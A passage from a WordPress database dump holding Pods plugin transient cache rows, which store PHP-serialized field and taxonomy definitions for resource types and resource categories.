Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}}}','off'),(5624462,'_transient_timeout_pods_09fb8b0d5d5bdc1360239913070dd9a5','1782126526','off'),(5624463,'_transient_pods_09fb8b0d5d5bdc1360239913070dd9a5','a:0:{}','off'),(5624476,'_transient_timeout_pods_f0eb86b2e7e6658581e2d09970c32363','1782126634','off'),(5624477,'_transient_pods_f0eb86b2e7e6658581e2d09970c32363','a:28:{s:11:\"object_type\";s:8:\"taxonomy\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"object_name\";s:13:\"resource_type\";s:19:\"object_hierarchical\";b:1;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_terms\";s:10:\"meta_table\";s:11:\"wp_termmeta\";s:9:\"pod_table\";s:21:\"wp_pods_resource_type\";s:8:\"field_id\";s:7:\"term_id\";s:11:\"field_index\";s:4:\"name\";s:10:\"field_slug\";s:4:\"slug\";s:10:\"field_type\";s:8:\"taxonomy\";s:12:\"field_parent\";s:6:\"parent\";s:19:\"field_parent_select\";s:13:\"`tt`.`parent`\";s:13:\"meta_field_id\";s:7:\"term_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:2:{s:2:\"tt\";s:70:\"LEFT JOIN `wp_term_taxonomy` AS `tt` ON `tt`.`term_id` = `t`.`term_id`\";s:2:\"tr\";s:94:\"LEFT JOIN `wp_term_relationships` AS `tr` ON `tr`.`term_taxonomy_id` = `tt`.`term_taxonomy_id`\";}s:5:\"where\";a:1:{s:11:\"tt.taxonomy\";s:33:\"`tt`.`taxonomy` = \'resource_type\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:25:\"`t`.`name`, `t`.`term_id`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:65:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:13:\"resource_type\";s:2:\"id\";i:465;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:14:\"Resource Types\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:13:\"Resource Type\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"1\";s:4:\"type\";s:8:\"taxonomy\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:13:\"resource_type\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:20:\"rewrite_hierarchical\";s:1:\"1\";s:15:\"capability_type\";s:7:\"default\";s:22:\"capability_type_custom\";s:13:\"resource_type\";s:9:\"query_var\";s:1:\"0\";s:4:\"sort\";s:1:\"0\";s:36:\"built_in_post_types_amn_wpforms-lite\";s:1:\"0\";s:30:\"built_in_post_types_custom_css\";s:1:\"0\";s:39:\"built_in_post_types_customize_changeset\";s:1:\"0\";s:28:\"built_in_post_types_document\";s:1:\"1\";s:32:\"built_in_post_types_elementor-hf\";s:1:\"0\";s:37:\"built_in_post_types_elementor_library\";s:1:\"0\";s:37:\"built_in_post_types_jet-smart-filters\";s:1:\"0\";s:33:\"built_in_post_types_news_resource\";s:1:\"1\";s:38:\"built_in_post_types_ocean_modal_window\";s:1:\"0\";s:38:\"built_in_post_types_ocean_posts_slider\";s:1:\"0\";s:35:\"built_in_post_types_oceanwp_library\";s:1:\"0\";s:32:\"built_in_post_types_oembed_cache\";s:1:\"0\";s:24:\"built_in_post_types_page\";s:1:\"0\";s:24:\"built_in_post_types_post\";s:1:\"0\";s:36:\"built_in_post_types_project_resource\";s:1:\"1\";s:33:\"built_in_post_types_related_topic\";s:1:\"1\";s:32:\"built_in_post_types_user_request\";s:1:\"0\";s:28:\"built_in_post_types_wp_block\";s:1:\"0\";s:27:\"built_in_post_types_wpforms\";s:1:\"0\";s:31:\"built_in_post_types_wpforms_log\";s:1:\"0\";s:30:\"built_in_post_types_attachment\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_location\";s:7:\"default\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:13:\"show_tagcloud\";s:1:\"1\";s:21:\"show_tagcloud_in_edit\";s:1:\"1\";s:18:\"show_in_quick_edit\";s:1:\"1\";s:17:\"show_admin_column\";s:1:\"0\";s:11:\"pfat_enable\";s:1:\"0\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:19:\"pfat_append_archive\";s:6:\"append\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:33:\"built_in_post_types_related_theme\";s:1:\"1\";s:33:\"built_in_post_types_inst_resource\";s:1:\"1\";s:32:\"built_in_post_types_mea_resource\";s:1:\"1\";s:36:\"built_in_post_types_knowledge_broker\";s:1:\"0\";s:31:\"built_in_post_types_institution\";s:1:\"0\";s:33:\"built_in_post_types_ekms_bulletin\";s:1:\"0\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:11:{s:7:\"term_id\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"term_id\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:2:{i:0;s:2:\"id\";i:1;s:2:\"ID\";}s:20:\"hide_in_default_form\";b:1;}s:4:\"name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"name\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:5:\"title\";}}s:4:\"slug\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"slug\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:9:\"permalink\";}}s:11:\"description\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:8:\"taxonomy\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"taxonomy\";s:5:\"label\";s:8:\"Taxonomy\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}}s:6:\"parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:16:\"term_taxonomy_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:16:\"term_taxonomy_id\";s:5:\"label\";s:16:\"Term Taxonomy ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"term_group\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_group\";s:5:\"label\";s:10:\"Term Group\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:5:\"group\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:5:\"count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:5:\"count\";s:5:\"label\";s:5:\"Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:9:\"object_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"object_id\";s:5:\"label\";s:9:\"Object ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:10:\"term_order\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_order\";s:5:\"label\";s:10:\"Term Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}}}','off'),(5624457,'_transient_timeout_pods_404fbcb90e9864dad09309efad57b593','1782126526','off'),(5624458,'_transient_pods_404fbcb90e9864dad09309efad57b593','a:28:{s:11:\"object_type\";s:8:\"taxonomy\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"object_name\";s:17:\"resource_category\";s:19:\"object_hierarchical\";b:1;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_terms\";s:10:\"meta_table\";s:11:\"wp_termmeta\";s:9:\"pod_table\";s:25:\"wp_pods_resource_category\";s:8:\"field_id\";s:7:\"term_id\";s:11:\"field_index\";s:4:\"name\";s:10:\"field_slug\";s:4:\"slug\";s:10:\"field_type\";s:8:\"taxonomy\";s:12:\"field_parent\";s:6:\"parent\";s:19:\"field_parent_select\";s:13:\"`tt`.`parent`\";s:13:\"meta_field_id\";s:7:\"term_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:2:{s:2:\"tt\";s:70:\"LEFT JOIN `wp_term_taxonomy` AS `tt` ON `tt`.`term_id` = `t`.`term_id`\";s:2:\"tr\";s:94:\"LEFT JOIN `wp_term_relationships` AS `tr` ON `tr`.`term_taxonomy_id` = `tt`.`term_taxonomy_id`\";}s:5:\"where\";a:1:{s:11:\"tt.taxonomy\";s:37:\"`tt`.`taxonomy` = \'resource_category\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:25:\"`t`.`name`, `t`.`term_id`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:67:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:17:\"resource_category\";s:2:\"id\";i:412;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:19:\"Resource Categories\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:17:\"Resource Category\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"1\";s:4:\"type\";s:8:\"taxonomy\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:17:\"resource_category\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:20:\"rewrite_hierarchical\";s:1:\"1\";s:15:\"capability_type\";s:7:\"default\";s:22:\"capability_type_custom\";s:17:\"resource_category\";s:9:\"query_var\";s:1:\"0\";s:4:\"sort\";s:1:\"0\";s:36:\"built_in_post_types_amn_wpforms-lite\";s:1:\"0\";s:30:\"built_in_post_types_custom_css\";s:1:\"0\";s:39:\"built_in_post_types_customize_changeset\";s:1:\"0\";s:32:\"built_in_post_types_elementor-hf\";s:1:\"0\";s:37:\"built_in_post_types_elementor_library\";s:1:\"0\";s:37:\"built_in_post_types_jet-smart-filters\";s:1:\"0\";s:38:\"built_in_post_types_ocean_modal_window\";s:1:\"0\";s:38:\"built_in_post_types_ocean_posts_slider\";s:1:\"0\";s:35:\"built_in_post_types_oceanwp_library\";s:1:\"0\";s:32:\"built_in_post_types_oembed_cache\";s:1:\"0\";s:24:\"built_in_post_types_page\";s:1:\"0\";s:24:\"built_in_post_types_post\";s:1:\"0\";s:32:\"built_in_post_types_user_request\";s:1:\"0\";s:28:\"built_in_post_types_wp_block\";s:1:\"0\";s:27:\"built_in_post_types_wpforms\";s:1:\"0\";s:31:\"built_in_post_types_wpforms_log\";s:1:\"0\";s:30:\"built_in_post_types_attachment\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_location\";s:7:\"default\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:13:\"show_tagcloud\";s:1:\"1\";s:21:\"show_tagcloud_in_edit\";s:1:\"1\";s:18:\"show_in_quick_edit\";s:1:\"1\";s:17:\"show_admin_column\";s:1:\"0\";s:11:\"pfat_enable\";s:1:\"0\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:19:\"pfat_append_archive\";s:6:\"append\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:32:\"built_in_post_types_epa_resource\";s:1:\"1\";s:32:\"built_in_post_types_epa_document\";s:1:\"1\";s:28:\"built_in_post_types_document\";s:1:\"1\";s:33:\"built_in_post_types_news_resource\";s:1:\"1\";s:33:\"built_in_post_types_related_theme\";s:1:\"1\";s:31:\"built_in_post_types_institution\";s:1:\"0\";s:33:\"built_in_post_types_inst_resource\";s:1:\"0\";s:36:\"built_in_post_types_knowledge_broker\";s:1:\"0\";s:36:\"built_in_post_types_project_resource\";s:1:\"0\";s:33:\"built_in_post_types_related_topic\";s:1:\"0\";s:32:\"built_in_post_types_mea_resource\";s:1:\"0\";s:33:\"built_in_post_types_ekms_bulletin\";s:1:\"0\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:11:{s:7:\"term_id\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"term_id\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:2:{i:0;s:2:\"id\";i:1;s:2:\"ID\";}s:20:\"hide_in_default_form\";b:1;}s:4:\"name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"name\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:5:\"title\";}}s:4:\"slug\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"slug\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:9:\"permalink\";}}s:11:\"description\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:8:\"taxonomy\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"taxonomy\";s:5:\"label\";s:8:\"Taxonomy\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}}s:6:\"parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:16:\"term_taxonomy_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:16:\"term_taxonomy_id\";s:5:\"label\";s:16:\"Term Taxonomy ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"term_group\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_group\";s:5:\"label\";s:10:\"Term 